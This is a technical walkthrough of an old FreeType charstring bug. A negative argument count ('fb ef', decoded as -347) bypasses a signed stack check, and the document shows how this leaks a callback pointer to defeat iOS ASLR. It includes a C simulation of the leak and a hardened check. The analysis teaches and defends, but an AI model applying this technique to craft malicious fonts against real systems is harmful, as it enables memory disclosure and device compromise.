In the op_callothersubr handler, arg_cnt is declared as a signed int and is read from decoder->stack. The charstring bytes "fb ef" encode the number -347, which FreeType pushes onto the stack as the 16.16 fixed-point value 0xfea50000, so Fix2Int(top[0]) yields arg_cnt = -347.
The stack check is `if ( arg_cnt > top - decoder->stack ) goto Stack_Underflow;`, and a negative arg_cnt is never greater than the stack depth, so the check is bypassed. Then `top -= arg_cnt` moves top forward by 347 entries (each entry is an FT_Long, 4 bytes on 32-bit iOS), past the 256-entry decoder->stack array and into the rest of the decoder structure. There it points at decoder->parse_callback, so the address of that callback can be read back as if it were a stack operand. Subtracting the function's default (unslid) address from the leaked value gives the ASLR slide. That's how the exploit bypasses ASLR.
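The walk described above, modelled as an added C example (not code from this page or from FreeType): it decodes the "fb ef" bytes with a Type 1 number decoder, pushes the result as 16.16 fixed point the way decoder->stack holds it, shows the signed check accepting the negative count while a hardened check rejects it, and reproduces the `top -= arg_cnt` step against a simplified decoder struct. The struct layout and its filler size, the 32-bit modelling of the callback pointer, the callback address 0x30a1c000 and the unslid address 0x30a10000 are assumptions chosen for the example; the 256-entry stack size and the 16.16 representation are FreeType's.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define T1_MAX_CHARSTRINGS_OPERANDS 256   /* size of decoder->stack in FreeType */

/* Simplified stand-in for FreeType's T1_DecoderRec. Assumption: the real struct
 * has many fields (top, zones, ...) between stack and parse_callback; the filler
 * is sized so parse_callback sits exactly 347 entries past stack[0], as the text
 * describes for the 32-bit target. The callback is modelled as a 32-bit address. */
typedef struct {
    int32_t  stack[T1_MAX_CHARSTRINGS_OPERANDS];  /* 1024 bytes */
    uint8_t  other_fields[364];                   /* opaque filler (assumed size) */
    uint32_t parse_callback;                      /* lands at byte offset 1388 */
} model_decoder;

/* The charstring from the text: bytes "fb ef". */
const uint8_t CHARSTRING_FB_EF[2] = { 0xfb, 0xef };

/* Decode one Type 1 charstring number (all four encodings). Returns the number
 * of bytes consumed, or 0 if p does not start with a number. */
size_t decode_t1_number(const uint8_t *p, size_t len, int32_t *out)
{
    if (len == 0 || p[0] < 32)            /* 0..31 are operators */
        return 0;
    if (p[0] <= 246) { *out = (int32_t)p[0] - 139; return 1; }
    if (p[0] <= 250) {                    /* 108 .. 1131 */
        if (len < 2) return 0;
        *out = ((int32_t)p[0] - 247) * 256 + p[1] + 108;
        return 2;
    }
    if (p[0] <= 254) {                    /* -1131 .. -108 */
        if (len < 2) return 0;
        *out = -(((int32_t)p[0] - 251) * 256) - p[1] - 108;
        return 2;
    }
    if (len < 5) return 0;                /* 255: 32-bit big-endian integer */
    *out = (int32_t)(((uint32_t)p[1] << 24) | ((uint32_t)p[2] << 16) |
                     ((uint32_t)p[3] << 8)  |  (uint32_t)p[4]);
    return 5;
}

/* Operands live on decoder->stack as 16.16 fixed point; arg_cnt is read back
 * with Fix2Int(). fix2int truncates toward zero, exact for integral values. */
int32_t to_fixed(int32_t v) { return (int32_t)((uint32_t)v << 16); }
int32_t fix2int(int32_t f)  { return (int32_t)((int64_t)f / 65536); }

/* arg_cnt as the handler sees it: number pushed as fixed, then popped via Fix2Int. */
int32_t parse_arg_cnt(const uint8_t *cs, size_t len)
{
    int32_t v;
    if (decode_t1_number(cs, len, &v) == 0)
        return 0;
    return fix2int(to_fixed(v));
}

/* Vulnerable check: `if ( arg_cnt > top - decoder->stack ) goto Stack_Underflow;`
 * where depth is top - decoder->stack. A negative count is never greater. */
int vulnerable_check_accepts(int32_t arg_cnt, ptrdiff_t depth)
{
    return !(arg_cnt > depth);
}

/* Hardened check (this example's own form, not a quote of FreeType's patch):
 * reject negative counts as well as counts exceeding the current depth. */
int hardened_check_accepts(int32_t arg_cnt, ptrdiff_t depth)
{
    return arg_cnt >= 0 && arg_cnt <= depth;
}

/* Model `top -= arg_cnt` with a negative count: returns the 32-bit value top now
 * aliases, or 0 if the check rejects or the offset leaves the model struct. */
uint32_t simulate_leak(int32_t arg_cnt, uint32_t callback_addr)
{
    model_decoder dec;
    memset(&dec, 0, sizeof dec);
    dec.parse_callback = callback_addr;

    /* After `top -= 2` removed subr_no and arg_cnt nothing else is on the
     * stack, so top == &stack[0] and the depth is 0. */
    ptrdiff_t depth = 0;
    if (!vulnerable_check_accepts(arg_cnt, depth))
        return 0;

    /* top -= arg_cnt: with arg_cnt == -347 top moves 347 entries forward. Done
     * as a byte offset from the struct base rather than forming an
     * out-of-bounds pointer, which would be undefined behaviour in C. */
    size_t off = (size_t)(depth - arg_cnt) * sizeof(int32_t);   /* 1388 */
    if (off + sizeof(uint32_t) > sizeof dec)
        return 0;
    uint32_t leaked;
    memcpy(&leaked, (const uint8_t *)&dec + off, sizeof leaked);
    return leaked;
}

/* ASLR slide = leaked callback address minus its unslid (default) address. */
uint32_t aslr_slide(uint32_t leaked, uint32_t unslid) { return leaked - unslid; }

int main(void)
{
    int32_t  arg_cnt = parse_arg_cnt(CHARSTRING_FB_EF, sizeof CHARSTRING_FB_EF);
    uint32_t assumed_cb = 0x30a1c000u;    /* constructed address, not a real one */
    uint32_t leaked = simulate_leak(arg_cnt, assumed_cb);
    printf("fb ef -> arg_cnt=%d (fixed 0x%08x), vulnerable accepts=%d, hardened accepts=%d\n",
           arg_cnt, (uint32_t)to_fixed(arg_cnt),
           vulnerable_check_accepts(arg_cnt, 0), hardened_check_accepts(arg_cnt, 0));
    printf("top now aliases parse_callback: 0x%08x, slide 0x%08x\n",
           leaked, aslr_slide(leaked, 0x30a10000u));
    return 0;
}
```

The point the model makes concrete is that the check is a signed comparison against a count the font controls: any negative count passes, and because `top` is then moved by `-arg_cnt` entries, the font author picks the exact struct field that the next stack read aliases.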
When Apple patched this vulnerability in iOS 4.2.9 and 4.3.4, the bug was assigned a different CVE identifier, CVE-2011-0226.